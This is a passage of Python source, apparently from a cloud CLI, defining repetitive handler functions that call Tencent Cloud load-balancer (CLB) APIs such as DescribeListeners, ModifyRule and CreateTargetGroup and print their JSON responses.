    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeBlockIPListRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeBlockIPList(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeListeners(args, parsed_globals):
    """Call the CLB DescribeListeners API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeListenersRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeListenersRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeListeners(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBTargets(args, parsed_globals):
    """Call the CLB DescribeClassicalLBTargets API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeClassicalLBTargetsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeClassicalLBTargetsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeClassicalLBTargets(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTopic(args, parsed_globals):
    """Call the CLB CreateTopic API and print its JSON response.

    args: dict of request parameters, serialized into a CreateTopicRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateTopicRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CreateTopic(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchRegisterTargets(args, parsed_globals):
    """Call the CLB BatchRegisterTargets API and print its JSON response.

    args: dict of request parameters, serialized into a BatchRegisterTargetsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.BatchRegisterTargetsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.BatchRegisterTargets(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClsLogSet(args, parsed_globals):
    """Call the CLB DescribeClsLogSet API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeClsLogSetRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeClsLogSetRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeClsLogSet(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCustomizedConfigList(args, parsed_globals):
    """Call the CLB DescribeCustomizedConfigList API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeCustomizedConfigListRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeCustomizedConfigListRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeCustomizedConfigList(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetWeight(args, parsed_globals):
    """Call the CLB ModifyTargetWeight API and print its JSON response.

    args: dict of request parameters, serialized into a ModifyTargetWeightRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTargetWeightRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ModifyTargetWeight(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskStatus(args, parsed_globals):
    """Call the CLB DescribeTaskStatus API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeTaskStatusRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTaskStatusRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeTaskStatus(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroups(args, parsed_globals):
    """Call the CLB DescribeTargetGroups API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeTargetGroupsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTargetGroupsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeTargetGroups(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyRule(args, parsed_globals):
    """Call the CLB ModifyRule API and print its JSON response.

    args: dict of request parameters, serialized into a ModifyRuleRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyRuleRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ModifyRule(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRule(args, parsed_globals):
    """Call the CLB DeleteRule API and print its JSON response.

    args: dict of request parameters, serialized into a DeleteRuleRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteRuleRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DeleteRule(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetLoadBalancerClsLog(args, parsed_globals):
    """Call the CLB SetLoadBalancerClsLog API and print its JSON response.

    args: dict of request parameters, serialized into a SetLoadBalancerClsLogRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.SetLoadBalancerClsLogRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.SetLoadBalancerClsLog(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroupList(args, parsed_globals):
    """Call the CLB DescribeTargetGroupList API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeTargetGroupListRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTargetGroupListRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeTargetGroupList(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyBlockIPList(args, parsed_globals):
    """Call the CLB ModifyBlockIPList API and print its JSON response.

    args: dict of request parameters, serialized into a ModifyBlockIPListRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyBlockIPListRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ModifyBlockIPList(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTargetGroup(args, parsed_globals):
    """Call the CLB CreateTargetGroup API and print its JSON response.

    args: dict of request parameters, serialized into a CreateTargetGroupRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateTargetGroupRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.CreateTargetGroup(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargets(args, parsed_globals):
    """Call the CLB DescribeTargets API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeTargetsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTargetsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeTargets(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRewrite(args, parsed_globals):
    """Call the CLB DescribeRewrite API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeRewriteRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeRewriteRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeRewrite(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRegisterTargetsWithClassicalLB(args, parsed_globals):
    """Call the CLB RegisterTargetsWithClassicalLB API and print its JSON response.

    args: dict of request parameters, serialized into a RegisterTargetsWithClassicalLBRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.RegisterTargetsWithClassicalLBRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.RegisterTargetsWithClassicalLB(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetPort(args, parsed_globals):
    """Call the CLB ModifyTargetPort API and print its JSON response.

    args: dict of request parameters, serialized into a ModifyTargetPortRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTargetPortRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ModifyTargetPort(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupAttribute(args, parsed_globals):
    """Call the CLB ModifyTargetGroupAttribute API and print its JSON response.

    args: dict of request parameters, serialized into a ModifyTargetGroupAttributeRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTargetGroupAttributeRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.ModifyTargetGroupAttribute(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBHealthStatus(args, parsed_globals):
    """Call the CLB DescribeClassicalLBHealthStatus API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeClassicalLBHealthStatusRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeClassicalLBHealthStatusRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeClassicalLBHealthStatus(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
